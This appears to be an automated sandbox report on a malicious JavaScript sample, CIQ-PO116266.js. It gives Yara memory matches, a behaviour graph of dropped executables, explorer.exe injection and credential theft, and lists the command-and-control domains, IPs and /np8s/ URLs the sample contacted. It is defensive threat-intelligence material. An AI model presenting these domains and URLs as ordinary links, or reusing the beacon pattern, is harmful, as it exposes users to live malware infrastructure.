Source: Yara match File source: 0000000F.00000002.812070527.000001D194C8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.812584046.0000013D8F46A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.808147035.00000216DFE16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.830179135.000001922AD6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.807957265.00000216DE0A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 2612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wscript.exe PID: 1892, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 635299 Sample: CIQ-PO116266.js Startdate: 27/05/2022 Architecture: WINDOWS Score: 100 54 www.kishanshree.com 2->54 56 www.geo-pacificoffshore.com 2->56 58 kishanshree.com 2->58 74 Snort IDS alert for network traffic 2->74 76 Multi AV Scanner detection for domain / URL 2->76 78 Found malware configuration 2->78 80 12 other signatures 2->80 11 wscript.exe 3 2->11         started        signatures3 process4 file5 50 C:\Users\user\AppData\Local\Temp\bin.exe, PE32 11->50 dropped 52 C:\Users\user\AppData\Roaming\ORYNeBzyRj.js, ASCII 11->52 dropped 100 System process connects to network (likely due to code injection or exploit) 11->100 102 Benign windows process drops PE files 11->102 104 Drops script or batch files to the startup folder 11->104 106 2 other signatures 11->106 15 bin.exe 11->15         started        18 wscript.exe 2 13 11->18         started        signatures6 process7 dnsIp8 108 Antivirus detection for dropped file 15->108 110 Multi AV Scanner detection for dropped file 15->110 112 Machine Learning detection for dropped file 15->112 114 5 other signatures 15->114 22 explorer.exe 3 6 15->22 injected 60 dilshadkhan.duia.ro 91.193.75.133, 49726, 49730, 49743 DAVID_CRAIGGG Serbia 18->60 46 C:\Users\user\AppData\...\ORYNeBzyRj.js, ASCII 18->46 dropped file9 signatures10 process11 dnsIp12 62 losangelesrentalz.com 15.197.142.173, 49918, 49919, 49920 TANDEMUS United States 22->62 64 xn--wsthof-camping-gsb.com 81.169.145.161, 49807, 80 STRATOSTRATOAGDE Germany 22->64 66 28 other IPs or domains 22->66 48 C:\Users\user\AppData\Local\...\msdxp.exe, PE32 22->48 dropped 84 System process connects to network (likely due to code injection or exploit) 22->84 86 Performs DNS queries to domains with low reputation 22->86 88 Uses netsh to modify the Windows network and firewall settings 22->88 27 netsh.exe 1 12 22->27         started        30 wscript.exe 12 22->30         started        33 wscript.exe 12 22->33         started        35 wscript.exe 22->35         started        file13 signatures14 process15 dnsIp16 90 Tries to steal Mail credentials (via file / registry access) 27->90 92 Creates multiple autostart registry keys 27->92 94 Tries to harvest and steal browser information (history, passwords, etc) 27->94 98 3 other signatures 27->98 37 cmd.exe 2 27->37         started        40 cmd.exe 1 27->40         started        68 dilshadkhan.duia.ro 30->68 96 System process connects to network (likely due to code injection or exploit) 30->96 70 dilshadkhan.duia.ro 33->70 72 dilshadkhan.duia.ro 35->72 signatures17 process18 signatures19 82 Tries to harvest and steal browser information (history, passwords, etc) 37->82 42 conhost.exe 37->42         started        44 conhost.exe 40->44         started        process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
170.39.76.27
 www.jlbwaterdamagerepairseattle.com Reserved
139776 PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY true
104.21.8.218
 www.medyumgalip.com United States
13335 CLOUDFLARENETUS true
154.220.100.142
 www.interlink-travel.com Seychelles
133201 COMING-ASABCDEGROUPCOMPANYLIMITEDHK true
160.153.136.3
 littlebeartreeservices.com United States
21501 GODADDY-AMSDE true
15.197.142.173
 losangelesrentalz.com United States
7430 TANDEMUS true
81.169.145.161
 xn--wsthof-camping-gsb.com Germany
6724 STRATOSTRATOAGDE true
162.0.230.89
 www.topings33.com Canada
22612 NAMECHEAP-NETUS true
52.17.43.61
 shop.freewebstore.org United States
16509 AMAZON-02US false
132.148.165.111
 kishanshree.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
188.114.96.3
 www.salondutaxi.com European Union
13335 CLOUDFLARENETUS true
34.102.136.180
 brandingaloha.com United States
15169 GOOGLEUS false
198.54.117.244
 www.nachuejooj07.xyz United States
22612 NAMECHEAP-NETUS true
198.54.117.211
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
23.82.37.10
 www.shcylzc.com United States
396190 LEASEWEB-USA-SEA-10US true
91.193.75.133
 dilshadkhan.duia.ro Serbia
209623 DAVID_CRAIGGG true
103.247.11.212
 sekolahkejepang.com Indonesia
58487 RUMAHWEB-AS-IDRumahwebIndonesiaCVID true
45.39.111.146
 www.68chengxinle.com United States
18779 EGIHOSTINGUS true
198.54.117.216
 unknown United States
22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
www.nachuejooj07.xyz 198.54.117.244 true
littlebeartreeservices.com 160.153.136.3 true
losangelesrentalz.com 15.197.142.173 true
www.medyumgalip.com 104.21.8.218 true
parkingpage.namecheap.com 198.54.117.211 true
dilshadkhan.duia.ro 91.193.75.133 true
sekolahkejepang.com 103.247.11.212 true
www.topings33.com 162.0.230.89 true
shop.freewebstore.org 52.17.43.61 true
www.interlink-travel.com 154.220.100.142 true
www.jlbwaterdamagerepairseattle.com 170.39.76.27 true
www.salondutaxi.com 188.114.96.3 true
www.68chengxinle.com 45.39.111.146 true
xn--wsthof-camping-gsb.com 81.169.145.161 true
kishanshree.com 132.148.165.111 true
brandingaloha.com 34.102.136.180 true
www.shcylzc.com 23.82.37.10 true
www.wps-mtb.com unknown unknown
www.littlebeartreeservices.com unknown unknown
www.kishanshree.com unknown unknown
www.geo-pacificoffshore.com unknown unknown
www.lazarusnatura.com unknown unknown
www.jdhwh2nbiw234.com unknown unknown
www.brandingaloha.com unknown unknown
www.sekolahkejepang.com unknown unknown
www.brawlhallacodestore.com unknown unknown
www.gafcbooster.com unknown unknown
www.udrivestorage.com unknown unknown
www.xn--wsthof-camping-gsb.com unknown unknown
www.losangelesrentalz.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.salondutaxi.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.littlebeartreeservices.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
www.gafcbooster.com/np8s/ true
  • Avira URL Cloud: malware
 low
http://www.medyumgalip.com/np8s/?2dEPbf=4hfxZPP84Ri&U48h=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs2mn5+uwvQPb true
  • Avira URL Cloud: safe
 unknown
http://www.lazarusnatura.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.interlink-travel.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.kishanshree.com/np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: safe
 unknown
http://www.sekolahkejepang.com/np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: safe
 unknown
http://www.lazarusnatura.com/np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU true
  • Avira URL Cloud: malware
 unknown
http://www.udrivestorage.com/np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri true
  • Avira URL Cloud: malware
 unknown
http://www.brandingaloha.com/np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw false
  • Avira URL Cloud: malware
 unknown
http://www.interlink-travel.com/np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri true
  • Avira URL Cloud: malware
 unknown
http://www.losangelesrentalz.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.nachuejooj07.xyz/np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: phishing
 unknown
http://www.udrivestorage.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.topings33.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.kishanshree.com/np8s/?2dEPbf=4hfxZPP84Ri&U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs true
  • Avira URL Cloud: safe
 unknown
http://www.brawlhallacodestore.com/np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: malware
 unknown
http://www.jlbwaterdamagerepairseattle.com/np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: malware
 unknown
http://www.xn--wsthof-camping-gsb.com/np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: malware
 unknown
http://www.kishanshree.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.losangelesrentalz.com/np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: safe
 unknown
http://www.shcylzc.com/np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: safe
 unknown
http://www.sekolahkejepang.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.68chengxinle.com/np8s/ true
  • Avira URL Cloud: malware
 unknown
http://www.shcylzc.com/np8s/ true
  • Avira URL Cloud: safe
 unknown
http://www.topings33.com/np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw true
  • Avira URL Cloud: malware
 unknown